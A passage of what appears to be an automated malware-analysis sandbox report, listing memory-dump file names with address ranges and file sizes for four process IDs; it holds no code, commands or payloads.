              • memory/3488-164-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-106-0x0000026CBB490000-0x0000026CBB4B0000-memory.dmp

                Filesize

                128KB

              • memory/3488-108-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-109-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-162-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-112-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-160-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-114-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-116-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-118-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-120-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-122-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-124-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-126-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-128-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-130-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-132-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-134-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-136-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-158-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-140-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-156-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-144-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-146-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-148-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-150-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-152-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-154-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3592-113-0x00007FF789FD0000-0x00007FF789FE6000-memory.dmp

                Filesize

                88KB

              • memory/3592-107-0x00007FF789FD0000-0x00007FF789FE6000-memory.dmp

                Filesize

                88KB

              • memory/3984-105-0x00007FF781CC0000-0x00007FF781ED1000-memory.dmp

                Filesize

                2.1MB

              • memory/3984-47-0x00007FF781CC0000-0x00007FF781ED1000-memory.dmp

                Filesize

                2.1MB

              • memory/4832-71-0x00000249C4230000-0x00000249C424A000-memory.dmp

                Filesize

                104KB

              • memory/4832-73-0x00000249C1C80000-0x00000249C1C86000-memory.dmp

                Filesize

                24KB

              • memory/4832-72-0x00000249C1C70000-0x00000249C1C78000-memory.dmp

                Filesize

                32KB

              • memory/4832-70-0x00000249C1C60000-0x00000249C1C6A000-memory.dmp

                Filesize

                40KB

              • memory/4832-69-0x00000249C4210000-0x00000249C422C000-memory.dmp

                Filesize

                112KB

              • memory/4832-68-0x00000249C1C50000-0x00000249C1C5A000-memory.dmp

                Filesize

                40KB

              • memory/4832-67-0x00000249C4010000-0x00000249C40C5000-memory.dmp

                Filesize

                724KB

              • memory/4832-66-0x00000249C1C30000-0x00000249C1C4C000-memory.dmp

                Filesize

                112KB

              • memory/4832-74-0x00000249C4250000-0x00000249C425A000-memory.dmp

                Filesize

                40KB